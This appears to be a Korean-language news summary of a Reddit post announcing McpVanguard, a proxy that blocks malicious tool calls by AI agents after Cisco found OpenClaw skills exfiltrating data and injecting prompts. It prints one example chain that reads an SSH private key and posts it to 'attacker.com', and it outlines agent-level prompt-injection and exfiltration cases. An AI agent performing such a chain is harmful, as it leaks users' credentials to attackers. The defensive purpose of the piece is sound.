McpVanguard 프록시, OpenClaw 스킬 데이터 유출 차단

Cisco의 AI 보안 팀이 제3자 OpenClaw 스킬이 무단 데이터 유출과 프롬프트 주입을 수행하는 것을 발견한 데 대한 대응으로, 한 개발자가 McpVanguard를 출시했습니다. 이는 AI 에이전트와 그 도구 사이에 위치하여 악성 호출이 실행되기 전에 차단하도록 설계된 프록시입니다.
문제: 연쇄적인 악성 호출
보안 문제는 OpenClaw 자체의 버그가 아니라, 에이전트가 파일 시스템 접근, 셸 실행, 네트워크 호출을 강제 경계 없이 가질 수 있는 결과입니다. Cisco의 테스트는 겉보기에 무해한 개별 호출이 결합하여 침해를 일으키는 패턴을 드러냈습니다. 예를 들어:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)어떤 호출도 단독으로는 악성으로 보이지 않지만, 함께 작동하면 민감한 데이터를 유출합니다. 소스에 따르면, ClawHub는 정점에서 820개 이상의 악성 스킬을 보유했으며, CVE-2026-25253은 공격자가 단일 악성 링크를 통해 원격 코드 실행을 달성할 수 있게 했습니다. 현재의 스킬 수준 검증은 이러한 연쇄 호출 시퀀스를 감지하지 못합니다.
해결책: McpVanguard 프록시
McpVanguard는 에이전트와 그 도구 사이의 호출을 가로채어 이 문제를 해결합니다. 세 가지 탐지 방법을 사용합니다:
- 패턴 매칭
- 의미적 의도 점수화
- 전체 세션에 걸친 행동 연쇄 탐지
설치는 pip를 통해 가능합니다: pip install mcp-vanguard.
심층 계층: VEX 프로토콜
이 프로젝트는 "비행 기록 장치" 시스템으로 설명되는 VEX 프로토콜이라는 더 깊은 보안 계층을 포함합니다. 이는 다음을 제공합니다:
- 변조 감지 로깅을 위한 Merkle 감사 추적
- TPM 기반 에이전트 신원 확인
- 시스템 호출 수준의 강제 실행
VEX 프로토콜은 Rust로 구축되었으며, 개발은 OpenClaw가 널리 인기를 얻기 전인 2023년 12월에 시작되었습니다. 소스는 NVIDIA가 최근 유사한 보안 목적으로 NemoClaw를 출시했으며, 이는 이러한 유형의 위협이 사라지지 않을 것임을 나타낸다고 언급합니다.
두 프로젝트 모두 GitHub에서 이용 가능합니다:
📖 Read the full source: r/openclaw
👀 See Also

스킬 애널라이저가 ClawHub에서 사용 가능해졌으며, 단일 명령어로 설치할 수 있습니다.
OpenClaw Skill Analyzer 보안 스캐너가 이제 ClawHub에서 단일 명령어로 설치 가능합니다. 이 도구는 프롬프트 주입 및 자격 증명 도난과 같은 악성 패턴을 스킬 폴더에서 검사하며, 안전한 실행을 위한 Docker 샌드박스 지원을 포함합니다.
AI 에이전트 보안: 토큰 예산이 데이터 유출 위험을 결정한다
한 개발자가 Gmail에 연결된 AI 에이전트를 테스트했습니다: 프론티어 모델은 피싱을 잡아냈고, 중간 티어는 불안정했으며, 저렴한 모델은 악성 이메일을 조용히 전달했습니다. 아키텍처 보호(샌드박싱, 권한)는 단 한 번의 시도도 막지 못했습니다.

신뢰의 인간적 근원: 자율적 AI 에이전트에 대한 책임성 확립
Human Root of Trust는 암호화 수단을 통해 자율적 AI 에이전트의 책임성 부재 문제를 해결하는 공개 도메인 프레임워크입니다.

Tailscale을 이용한 OpenClaw의 안전한 원격 접속
없음